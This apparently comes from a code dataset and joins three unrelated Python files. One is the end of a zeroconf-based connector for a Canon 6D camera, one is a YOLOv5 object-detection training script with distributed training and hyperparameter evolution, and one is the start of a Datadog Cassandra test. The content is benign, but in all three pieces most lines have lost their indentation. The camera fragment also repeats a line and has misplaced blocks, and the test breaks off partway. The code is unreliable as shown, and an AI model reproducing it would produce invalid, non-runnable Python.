browser = ServiceBrowser(zeroconf, "_daap._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_dacp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_touch-able._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_rsp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_rsp._tcp.local.", listener)
try:
input("Press enter to exit...\n\n")
finally:
zeroconf.close()
def connect(self, ip, guid):
        logger.info('Connecting to {0}, {1}'.format(ip, guid))
if len(self.connections) == 0:
connection = Canon6DConnection(ip, guid, self.callback)
connection.start()
self.connections.append(connection)
def remove_service(self, zeroconf, type, name):
print("Service %s removed" % (name,))
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
print("Service %s added, service info: %s" % (name, info))
if info is not None:
try:
guid = info.properties[b'sid.canon.com'].decode()
ip = socket.inet_ntoa(info.address)
self.connect(ip, guid)
            except (KeyError, TypeError):
                logger.info('not a Canon PTP/IP service')
def test_callback(camera):
print('camera_main', camera.guid)
camera.set_config('capture', 1)
config = camera.list_config()
print('got config')
for k in sorted(config.keys()):
v = config[k]
if v and (v[0] == 'radio'):
print(k, v, camera.get_config_choices(k))
else:
print(k, v)
result = camera.set_config('aperture', '8.0')
print('set aperture', result)
result = camera.set_config('capturetarget', 'Memory card')
print('set memory card', result)
result = camera.set_config('eosremoterelease', 'Immediate')
print('trigger capture', result)
time.sleep(1)
def main(args):
Canon6DConnector(test_callback)
if __name__ == "__main__":
main(sys.argv[1:])
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from copy import deepcopy
from pathlib import Path
from threading import Thread
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle, colorstr
from utils.google_utils import attempt_download
from utils.loss import ComputeLoss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first, is_parallel
from utils.wandb_logging.wandb_utils import WandbLogger, check_wandb_resume
logger = logging.getLogger(__name__)
def train(hyp, opt, device, tb_writer=None):
logger.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items()))
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict
is_coco = opt.data.endswith('coco.yaml')
    # Logging - do this before checking the dataset, since it might update data_dict
loggers = {'wandb': None} # loggers dict
if rank in [-1, 0]:
opt.hyp = hyp # add hyperparameters
run_id = torch.load(weights).get('wandb_id') if weights.endswith('.pt') and os.path.isfile(weights) else None
wandb_logger = WandbLogger(opt, Path(opt.save_dir).stem, run_id, data_dict)
loggers['wandb'] = wandb_logger.wandb
data_dict = wandb_logger.data_dict
if wandb_logger.wandb:
weights, epochs, hyp = opt.weights, opt.epochs, opt.hyp # WandbLogger might update weights, epochs if resuming
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
exclude = ['anchor'] if (opt.cfg or hyp.get('anchors')) and not opt.resume else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
model = Model(opt.cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
if opt.linear_lr:
lf = lambda x: (1 - x / (epochs - 1)) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear
else:
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
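    # one_cycle(1, hyp['lrf'], epochs) from utils.general is a cosine ramp,
    #   lf(x) = ((1 - cos(x * pi / epochs)) / 2) * (hyp['lrf'] - 1) + 1,
    # so the LR multiplier decays smoothly from 1.0 at epoch 0 to hyp['lrf']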
# plot_lr_scheduler(optimizer, scheduler, epochs)
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# EMA
if ema and ckpt.get('ema'):
ema.ema.load_state_dict(ckpt['ema'].float().state_dict())
ema.updates = ckpt['updates']
# Results
if ckpt.get('training_results') is not None:
results_file.write_text(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = max(int(model.stride.max()), 32) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,
world_size=opt.world_size, workers=opt.workers,
pad=0.5, prefix=colorstr('val: '))[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, names, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
model.half().float() # pre-reduce anchor precision
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank,
# nn.MultiheadAttention incompatibility with DDP https://github.com/pytorch/pytorch/issues/26698
find_unused_parameters=any(isinstance(layer, nn.MultiheadAttention) for layer in model.modules()))
# Model parameters
hyp['box'] *= 3. / nl # scale to layers
hyp['cls'] *= nc / 80. * 3. / nl # scale to classes and layers
hyp['obj'] *= (imgsz / 640) ** 2 * 3. / nl # scale to image size and layers
hyp['label_smoothing'] = opt.label_smoothing
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
compute_loss = ComputeLoss(model) # init loss class
logger.info(f'Image sizes {imgsz} train, {imgsz_test} test\n'
f'Using {dataloader.num_workers} dataloader workers\n'
f'Logging results to {save_dir}\n'
f'Starting training for {epochs} epochs...')
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
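            # Note: during warmup `accumulate` ramps from 1 toward nbs / total_batch_size
            # (nbs = nominal batch size defined earlier), so the effective batch size
            # approaches nbs before full-rate optimizer steps begin.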
# Multi-scale
if opt.multi_scale:
                sz = random.randrange(int(imgsz * 0.5), int(imgsz * 1.5 + gs)) // gs * gs  # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(torch.jit.trace(model, imgs, strict=False), []) # add model graph
elif plots and ni == 10 and wandb_logger.wandb:
wandb_logger.log({"Mosaics": [wandb_logger.wandb.Image(str(x), caption=x.name) for x in
save_dir.glob('train*.jpg') if x.exists()]})
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
wandb_logger.current_epoch = epoch + 1
results, maps, times = test.test(data_dict,
batch_size=batch_size * 2,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
verbose=nc < 50 and final_epoch,
plots=plots and final_epoch,
wandb_logger=wandb_logger,
compute_loss=compute_loss,
is_coco=is_coco)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # append metrics, val_loss
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb_logger.wandb:
wandb_logger.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
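            # fitness() (from the repo's utils) reduces [P, R, mAP@.5, mAP@.5:.95] to a scalar;
            # in stock YOLOv5 the weights are [0.0, 0.0, 0.1, 0.9], i.e. mAP-dominated.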
if fi > best_fitness:
best_fitness = fi
wandb_logger.end_epoch(best_result=best_fitness == fi)
# Save model
if (not opt.nosave) or (final_epoch and not opt.evolve): # if save
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': results_file.read_text(),
'model': deepcopy(model.module if is_parallel(model) else model).half(),
'ema': deepcopy(ema.ema).half(),
'updates': ema.updates,
'optimizer': optimizer.state_dict(),
'wandb_id': wandb_logger.wandb_run.id if wandb_logger.wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
if wandb_logger.wandb:
if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
wandb_logger.log_model(
last.parent, opt, epoch, fi, best_model=best_fitness == fi)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb_logger.wandb:
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
wandb_logger.log({"Results": [wandb_logger.wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
# Test best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
            for m in ((last, best) if best.exists() else (last,)):  # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=batch_size * 2,
imgsz=imgsz_test,
conf_thres=0.001,
iou_thres=0.7,
model=attempt_load(m, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=True,
plots=False,
is_coco=is_coco)
# Strip optimizers
final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
if wandb_logger.wandb and not opt.evolve: # Log the stripped model
wandb_logger.wandb.log_artifact(str(final), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['last', 'best', 'stripped'])
wandb_logger.finish_run()
else:
dist.destroy_process_group()
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr('tensorboard: ')
logger.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
                'mosaic': (1, 0.0, 1.0),  # image mosaic (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
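# --- Hedged sketch (illustration only; not part of the original script) ---
# The evolve loop above draws a fitness-weighted parent from evolve.txt and
# mutates each hyperparameter with probability mp by a clipped Gaussian gain.
# A minimal standalone version of that mutation step, assuming `meta` maps each
# hyp key to (gain, lower, upper) and `x` is one evolve.txt row with 7 result
# columns followed by the hyp values:
def _mutate_hyp_sketch(hyp, x, meta, mp=0.8, s=0.2):
    import numpy as np  # local import keeps the sketch self-contained
    g = np.array([m[0] for m in meta.values()])  # per-key mutation gains (0 disables)
    ng = len(meta)
    v = np.ones(ng)
    while all(v == 1):  # redraw until at least one key actually changes
        v = (g * (np.random.random(ng) < mp) * np.random.randn(ng) * np.random.random() * s + 1).clip(0.3, 3.0)
    for i, k in enumerate(hyp.keys()):
        hyp[k] = float(x[i + 7] * v[i])  # mutate from the parent's value
        hyp[k] = round(min(max(hyp[k], meta[k][1]), meta[k][2]), 5)  # clamp to meta limits
    return hyp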
|
test_cassandra.py
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import threading
import time
from types import ListType
import unittest
import os
import mock
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
import logging
LOG_INFO = {
'log_to_event_viewer': False,
'log_to_syslog': False,
'syslog_host': None,
'syslog_port': None,
'log_level': logging.INFO,
'disable_file_logging': True,
'collector_log_file': '/var/log/datadog/collector.log',
'forwarder_log_file': '/var/log/datadog/forwarder.log',
'dogstatsd_log_file': '/var/log/datadog/dogstatsd.log',
'jmxfetch_log_file': '/var/log/datadog/jmxfetch.log',
'go-metro_log_file': '/var/log/datadog/go-metro.log',
}
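# The logging config is patched before importing dogstatsd/jmxfetch so their
# module-level loggers pick up LOG_INFO at import time.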
with mock.patch('config.get_logging_config', return_value=LOG_INFO):
from dogstatsd import Server
from jmxfetch import JMXFetch
log = logging.getLogger('cassandra_test')
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
